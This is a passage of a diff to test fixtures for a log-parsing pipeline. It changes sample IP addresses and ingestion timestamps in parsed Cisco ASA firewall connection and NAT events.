UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:32:20.604023500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094843975Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:32:20.604029300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094845707Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:32:20.604035200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, @@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094847586Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:32:20.604041Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094849353Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:32:20.604046800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 @@ -4588,8 +4588,8 @@ }, "destination": { "port": 8269, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1456, @@ -4629,7 +4629,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4637,8 +4637,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094851178Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269", + "ingested": "2021-12-09T13:32:20.604052600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4671,8 +4671,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4707,7 +4707,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4716,8 +4716,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094852892Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", + "ingested": "2021-12-09T13:32:20.604058300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4733,7 +4733,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11782", "source_interface": "outside", "mapped_destination_port": 1456 @@ -4755,8 +4755,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4791,7 +4791,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4800,8 +4800,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094854615Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604064100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4817,7 +4817,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11783", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4839,8 +4839,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4875,7 +4875,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4885,8 +4885,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094856323Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:32:20.604070Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4918,8 +4918,8 @@ }, "destination": { "port": 8270, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1457, @@ -4959,7 +4959,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4967,8 +4967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094858039Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270", + "ingested": "2021-12-09T13:32:20.604093600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5001,8 +5001,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5037,7 +5037,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5046,8 +5046,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094859779Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", + "ingested": "2021-12-09T13:32:20.604115100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5063,7 +5063,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11784", "source_interface": "outside", "mapped_destination_port": 1457 @@ -5080,8 +5080,8 @@ }, "destination": { "port": 8271, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1458, @@ -5121,7 +5121,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5129,8 +5129,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094861511Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271", + "ingested": "2021-12-09T13:32:20.604119200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5163,8 +5163,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5199,7 +5199,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5208,8 +5208,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094863245Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", + "ingested": "2021-12-09T13:32:20.604123500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5225,7 +5225,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11785", "source_interface": "outside", "mapped_destination_port": 1458 @@ -5247,8 +5247,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5283,7 +5283,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5292,8 +5292,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094864986Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604128200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -5309,7 +5309,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.1.107", + "mapped_source_ip": "192.168.1.107", "connection_id": "11786", "source_interface": "outside", "mapped_destination_port": 56132 @@ -5331,8 +5331,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5367,7 +5367,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5378,8 +5378,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094866695Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "ingested": "2021-12-09T13:32:20.604132800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5411,8 +5411,8 @@ }, "destination": { "port": 8272, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1459, @@ -5452,7 +5452,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5460,8 +5460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094868465Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272", + "ingested": "2021-12-09T13:32:20.604136400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5494,8 +5494,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5530,7 +5530,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5539,8 +5539,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094870253Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", + "ingested": "2021-12-09T13:32:20.604140600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5556,7 +5556,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11787", "source_interface": "outside", "mapped_destination_port": 1459 @@ -5578,8 +5578,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5614,7 +5614,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5624,8 +5624,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094871988Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", + "ingested": "2021-12-09T13:32:20.604146Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5657,8 +5657,8 @@ }, "destination": { "port": 8273, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1460, @@ -5698,7 +5698,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5706,8 +5706,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094873752Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273", + "ingested": "2021-12-09T13:32:20.604151100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5740,8 +5740,8 @@ }, "source": { "port": 80, - "address": "100.66.192.44", - "ip": "100.66.192.44" + "address": "192.168.192.44", + "ip": "192.168.192.44" }, "tags": [ "preserve_original_event" @@ -5776,7 +5776,7 @@ "localhost" ], "ip": [ - "100.66.192.44", + "192.168.192.44", "172.31.98.44" ] }, @@ -5785,8 +5785,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094875462Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", + "ingested": "2021-12-09T13:32:20.604154700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5802,7 +5802,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.192.44", + "mapped_source_ip": "192.168.192.44", "connection_id": "11788", "source_interface": "outside", "mapped_destination_port": 1460 @@ -5840,8 +5840,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094877221Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604158400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -5866,8 +5866,8 @@ }, "destination": { "port": 8277, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1385, @@ -5907,7 +5907,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5915,8 +5915,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094878959Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277", + "ingested": "2021-12-09T13:32:20.604161700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5949,8 +5949,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -5985,7 +5985,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -5994,8 +5994,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094880685Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", + "ingested": "2021-12-09T13:32:20.604165800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6011,7 +6011,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.19.254", + "mapped_source_ip": "192.168.19.254", "connection_id": "11797", "source_interface": "outside", "mapped_destination_port": 1385 @@ -6049,8 +6049,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094882400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604171300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6096,8 +6096,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094884256Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604177Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6143,8 +6143,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094886688Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604182400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6190,8 +6190,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094888571Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604187800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6237,8 +6237,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094890305Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604193200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6284,8 +6284,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094892033Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604198500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6315,8 +6315,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6351,7 +6351,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6362,8 +6362,8 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094893764Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "ingested": "2021-12-09T13:32:20.604204Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:29:31.000Z", @@ -6400,8 +6400,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6436,7 +6436,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -6447,8 +6447,8 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094895508Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.604209400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -6480,8 +6480,8 @@ }, "destination": { "port": 8278, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1386, @@ -6521,7 +6521,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -6529,8 +6529,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094897282Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278", + "ingested": "2021-12-09T13:32:20.604214700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to 